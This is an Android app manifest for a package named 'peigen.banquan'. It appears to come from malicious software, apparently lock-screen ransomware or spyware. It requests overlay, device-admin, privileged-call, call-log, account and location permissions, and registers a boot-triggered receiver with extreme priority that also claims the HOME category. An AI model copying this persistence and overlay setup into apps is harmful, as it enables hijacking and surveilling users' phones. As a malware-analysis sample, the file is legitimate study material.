<?xml version='1.0' encoding='utf-8'?>
<manifest
	xmlns:android="http://schemas.android.com/apk/res/android"
	package="peigen.banquan"
	android:versionCode="1"
	android:versionName="1.0">
	<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
	<uses-permission android:name="android.permission.RECEIVE_USER_PRESENT"/>
	<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
	<uses-permission android:name="android.permission.GET_TASKS"/>
	<uses-permission android:name="android.permission.INTERNET"/>
	<uses-permission android:name="android.permission.VIBRATE"/>
	<uses-permission android:name="android.permission.WAKE_LOCK"/>
	<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
	<uses-permission android:name="android.permission.VIBRATE"/>
	<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
	<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
	<uses-permission android:name="android.permission.ACCESS_CHECKIN_PROPERTIES"/>
	<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
	<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
	<uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS"/>
	<uses-permission android:name="android.permission.ACCOUNT_MANAGER"/>
	<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
	<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
	<uses-permission android:name="android.permission.BIND_DEVICE_ADMIN"/>
	<uses-permission android:name="android.permission.BLUETOOTH_ADMIN"/>
	<uses-permission android:name="android.permission.CALL_PHONE"/>
	<uses-permission android:name="android.permission.CALL_PRIVILEGED"/>
	<uses-permission android:name="android.permission.READ_CALL_LOG"/>
	<uses-permission android:name="android.permission.GET_PACKAGE_SIZE"/>
	<application
		android:allowBackup="true"
		android:icon="@drawable/ic_launcher"
		android:label="@string/app_name"
		android:theme="@style/AppTheme">
		<activity
			android:name=".MainActivity"
			android:label="@string/app_name">
			<intent-filter>
				<action android:name="android.intent.action.MAIN"/>
				<category android:name="android.intent.category.LAUNCHER"/>
			</intent-filter>
		</activity>
		<service android:name="peigen"/>
		<receiver android:name="qd">
			<intent-filter android:priority="100000">
				<action android:name="android.intent.action.BATTERY_CHANGED"/>
				<action android:name="android.intent.action.DATA_ACTIVITY"/>
				<action android:name="android.intent.action.DATA_STATE"/>
				<action android:name="android.intent.action.DATE_CHANGED"/>
				<action android:name="android.server.checkin.FOTA_CANCEL"/>
				<action android:name="android.intent.action.MEDIABUTTON"/>
				<action android:name="android.intent.action.MEDIA_MOUNTED"/>
				<action android:name="android.intent.action.MEDIA_SCANNER_STARTED"/>
				<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED"/>
				<action android:name="android.intent.action.TIME_SET"/>
				<action android:name="android.intent.action.TIME_TICK"/>
				<action android:name="android.intent.action.UMS_CONNECTED"/>
				<action android:name="android.intent.action.WALLPAPER_CHANGED"/>
				<action android:name="android.intent.action.PACKAGE_ADDED"/>
				<action android:name="android.intent.action.PACKAGE_REMOVED"/>
				<action android:name="android.intent.action.PHONE_STATE"/>
				<action android:name="android.intent.action.BOOT_COMPLETED"/>
				<action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
				<action android:name="android.net.wifi.WIFI_STATE_CHANGED"/>
				<action android:name="android.net.wifi.STATE_CHANGE"/>
				<category android:name="android.intent.category.HOME"/>
			</intent-filter>
		</receiver>
	</application>
</manifest>